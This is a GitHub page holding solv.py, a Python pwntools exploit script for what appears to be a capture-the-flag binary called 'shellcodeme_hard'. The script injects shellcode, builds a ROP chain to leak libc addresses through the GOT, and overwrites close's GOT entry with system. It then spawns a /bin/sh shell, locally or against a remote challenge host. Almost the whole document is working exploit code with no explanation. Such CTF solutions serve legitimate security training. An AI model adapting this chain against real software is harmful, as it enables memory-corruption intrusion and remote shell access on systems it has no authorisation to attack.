-
Notifications
You must be signed in to change notification settings - Fork 1
/
solv.py
executable file
·69 lines (55 loc) · 1.49 KB
/
solv.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
#!/usr/bin/env python2
from pwn import *
def exploit():
# setup fgets
payload = """
pop rbp
push 0x4008A9
push 0x4008A9
push 0x4008A9
push 0x4008A9
push 0x4008A9
push 0x4008A9
push 0x4008A9
ret 0x40
"""
p.sendlineafter("code?", asm(payload))
rop = ROP(name)
rop.puts(binary.got["close"])
rop.puts(binary.got["fgets"])
rop.read(0, binary.got["close"])
rop.puts(binary.got["fgets"])
rop.read(0, binary.bss(0x800))
rop.close(binary.bss(0x800))
pause()
p.sendline(str(rop))
p.recvline()
close_leak = u64(p.recvline(keepends=False).ljust(8, "\x00"))
fgets_leak = u64(p.recvline(keepends=False).ljust(8, "\x00"))
libc.address = close_leak - libc.symbols["close"]
log.info("close_leak: 0x{:x}".format(close_leak))
log.info("fgets_leak: 0x{:x}".format(fgets_leak))
log.info("libc.address: 0x{:x}".format(libc.address))
p.send(p64(libc.symbols["system"]))
p.recvline()
p.send("/bin/sh\x00")
p.interactive()
if __name__ == "__main__":
name = "./shellcodeme_hard"
binary = ELF(name)
context.terminal=["tmux", "sp", "-h"]
# context.log_level = 'debug'
# context.timeout = 5
context.arch = "amd64"
if len(sys.argv) > 1:
p = remote("shellcodeme.420blaze.in", 4200)
libc = ELF("./libc6_2.19-0ubuntu6.14_amd64.so")
else:
# p = process(name, env={'LD_PRELOAD': libc_name})
p = process(name, env={})
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
gdb.attach(p, """
b system
c
""")
exploit()